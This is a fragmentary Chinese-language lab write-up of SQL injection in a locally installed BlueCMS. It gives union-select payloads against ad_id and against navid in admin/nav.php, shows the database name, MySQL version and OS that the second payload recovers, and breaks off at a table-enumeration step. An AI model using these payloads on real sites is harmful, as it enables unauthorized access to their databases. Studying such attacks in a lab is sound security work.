mysql匹配
4.再访问:http://localhost/bluecms_src/uploads/,可以看到已经安装好了
SQL注入
用Seay源代码审计系统审计一下看看,我们可以发现有很多可能的注入点...,因而存在SQL注入漏洞
还有一个有意思的点,查询结果是经过一系列判断后输出到了html的代码注释中,也就是说显示位在浏览器源码中查看
38行 echo "<!...ad_id=1 union select 1,2,3,4,5,6,7
'''
页面回显空白,查看源码看到只有7显示到界面,所以显示位在源码中,因此后面只能在源码中查看显示信息
'''
#查看数据库
view-source...act=edit&navid=1 union select 1,database(),version(),4,@@version_compile_os,6
'''
得到数据库:bluetest mysql...版本:5.5.53 操作系统:Win32
'''
##查看表名
http://127.0.0.1/bluecms_src/uploads/admin/nav.php?